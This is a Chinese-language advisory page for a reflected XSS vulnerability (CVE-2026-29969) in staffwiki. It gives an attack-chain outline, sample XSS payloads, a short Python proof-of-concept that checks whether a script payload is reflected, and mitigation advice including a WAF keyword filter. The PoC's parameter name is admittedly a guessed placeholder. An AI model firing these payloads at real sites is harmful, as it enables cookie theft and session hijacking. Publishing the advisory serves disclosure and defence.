CVE-2026-29969 CVSS 6.1 中危

CVE-2026-29969 staffwiki XSS漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-29969

漏洞类型

XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

staffwiki

漏洞概述

staffwiki v7.0.1.19219版本中的wff_cols_pref.css.aspx端点存在一处跨站脚本攻击（XSS）漏洞。该漏洞源于应用程序未能正确过滤用户通过HTTP请求提交的特定参数。攻击者可利用此漏洞，诱导受害者点击包含恶意JavaScript代码的特制链接。一旦受害者访问，恶意代码将在其浏览器上下文中执行。此漏洞可能导致用户Cookie窃取、会话劫持或页面内容篡改，对系统的机密性和完整性造成中等风险影响。

技术细节

该漏洞位于staffwiki的`wff_cols_pref.css.aspx`组件中，属于典型的输入验证缺失导致的安全缺陷。在CVSS 3.1评分体系中，攻击向量为网络（AV:N），无需认证（PR:N），且利用复杂度低（AC:L），表明攻击者可以轻易地远程发起攻击。漏洞原理是服务器端在处理HTTP请求参数时，直接将未经验证的数据输出到响应页面中，导致浏览器将其解析为可执行的脚本代码。攻击者可以构造包含HTML标签或JavaScript事件的Payload，例如`<img src=x onerror=alert(1)>`。由于作用域为改变（S:C），攻击者可能利用该漏洞进一步攻击同一浏览器上下文下的其他应用。利用过程通常涉及社会工程学，即诱骗具有特定权限的用户点击恶意链接，从而获取其登录凭证或执行未授权操作。

攻击链分析

STEP 1

1. 侦察与准备

攻击者确认目标使用staffwiki v7.0.1.19219，并定位到存在漏洞的wff_cols_pref.css.aspx端点。

STEP 2

2. 构造攻击载荷

攻击者编写一段恶意的JavaScript代码，并将其编码到HTTP请求参数中，形成特制的恶意URL。

STEP 3

3. 投递载荷

攻击者通过网络钓鱼、电子邮件或即时通讯工具，将包含恶意Payload的URL发送给目标用户。

STEP 4

4. 触发漏洞

目标用户在未察觉的情况下点击链接，向服务器发送请求。服务器将恶意脚本反射回用户浏览器并执行。

STEP 5

5. 执行恶意操作

脚本在用户浏览器上下文中运行，窃取Session Cookie、重定向页面或执行进一步的操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-29969: Reflected XSS in staffwiki
# Target endpoint: wff_cols_pref.css.aspx

def check_xss(target_url):
    # Malicious payload to test execution
    xss_payload = '"><script>alert(document.cookie)</script>'
    
    # The vulnerable parameter is assumed to be a query parameter based on common .aspx behavior
    # Adjust the parameter name ('vuln_param') based on actual application parameter
    params = {
        "vuln_param": xss_payload
    }
    
    try:
        response = requests.get(target_url, params=params, timeout=10)
        
        # Check if the payload is reflected unescaped in the response
        if xss_payload in response.text:
            print("[+] Potential XSS vulnerability detected!")
            print(f"[+] Payload: {xss_payload}")
            return True
        else:
            print("[-] Payload not reflected in response.")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error connecting to target: {e}")
        return False

if __name__ == "__main__":
    target = "http://target-staffwiki-url/wff_cols_pref.css.aspx"
    check_xss(target)

影响范围

staffwiki v7.0.1.19219

防御指南

临时缓解措施

在未应用官方补丁之前，建议管理员限制对该端点的外网访问，或通过反向代理/WAF过滤包含特殊字符（如 <, >, ', ", onerror, javascript:）的请求参数。同时，加强用户安全意识教育，提醒不要随意点击不明链接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表